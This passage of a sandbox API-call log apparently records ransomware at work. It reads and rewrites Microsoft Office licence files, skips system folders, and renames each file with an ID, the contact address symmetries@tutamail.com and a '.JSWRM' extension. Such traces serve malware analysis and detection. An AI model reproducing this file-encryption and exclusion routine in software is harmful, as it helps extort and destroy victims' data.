lpUsedDefaultChar=0x0) returned 5 [0106.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0106.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.646] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10635) returned 1 [0106.646] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0106.646] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0106.651] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.652] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0106.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.652] CloseHandle (hObject=0x45c) returned 1 [0106.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0106.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0106.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0106.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0106.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0106.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0106.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.652] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0106.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0106.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0106.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0106.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0106.654] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7f31688, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7f31688, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7ff0240, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x512b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookR_Retail-ppd.xrm-ms", cAlternateFileName="OU0A3A~1.XRM")) returned 1 [0106.654] lstrcmpiW (lpString1="OutlookR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0106.654] lstrcmpiW (lpString1="OutlookR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0106.654] lstrcmpiW (lpString1="OutlookR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0106.654] lstrcmpiW (lpString1="OutlookR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0106.654] lstrcmpiW (lpString1="OutlookR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.654] lstrcmpiW (lpString1="OutlookR_Retail-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.654] lstrcmpiW (lpString1="OutlookR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.654] lstrcmpiW (lpString1="OutlookR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.654] lstrcmpiW (lpString1="OutlookR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.654] lstrcmpiW (lpString1="OutlookR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0106.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0106.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240f48, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0106.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0106.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0106.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240fc0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0106.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0106.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0106.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0106.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.655] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20779) returned 1 [0106.655] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0106.655] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0106.658] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.658] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0106.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.658] CloseHandle (hObject=0x45c) returned 1 [0106.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0106.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0106.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0106.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0106.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0106.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0106.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.659] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0106.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0106.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0106.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0106.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0106.660] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7ca8e6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7ca8e6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7e0039f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d40, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookR_Retail-ul-oob.xrm-ms", cAlternateFileName="OU9B92~1.XRM")) returned 1 [0106.660] lstrcmpiW (lpString1="OutlookR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.660] lstrcmpiW (lpString1="OutlookR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.660] lstrcmpiW (lpString1="OutlookR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.660] lstrcmpiW (lpString1="OutlookR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.660] lstrcmpiW (lpString1="OutlookR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.660] lstrcmpiW (lpString1="OutlookR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.660] lstrcmpiW (lpString1="OutlookR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.660] lstrcmpiW (lpString1="OutlookR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.660] lstrcmpiW (lpString1="OutlookR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.660] lstrcmpiW (lpString1="OutlookR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0106.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241358, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0106.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0106.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0106.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0106.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.661] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11584) returned 1 [0106.661] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0106.661] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0106.670] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.670] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0106.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.677] CloseHandle (hObject=0x45c) returned 1 [0106.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0106.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0106.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0106.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0106.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0106.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0106.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.678] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0106.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0106.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0106.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0106.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0106.679] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7bc4076, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7bc4076, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7ccf0c5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dd9, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookR_Retail-ul-phn.xrm-ms", cAlternateFileName="OUE11F~1.XRM")) returned 1 [0106.679] lstrcmpiW (lpString1="OutlookR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0106.679] lstrcmpiW (lpString1="OutlookR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0106.679] lstrcmpiW (lpString1="OutlookR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0106.679] lstrcmpiW (lpString1="OutlookR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0106.679] lstrcmpiW (lpString1="OutlookR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0106.679] lstrcmpiW (lpString1="OutlookR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0106.679] lstrcmpiW (lpString1="OutlookR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0106.679] lstrcmpiW (lpString1="OutlookR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.679] lstrcmpiW (lpString1="OutlookR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0106.679] lstrcmpiW (lpString1="OutlookR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0106.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0106.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241178, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0106.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Retail-ul-phn.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241100, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0106.680] 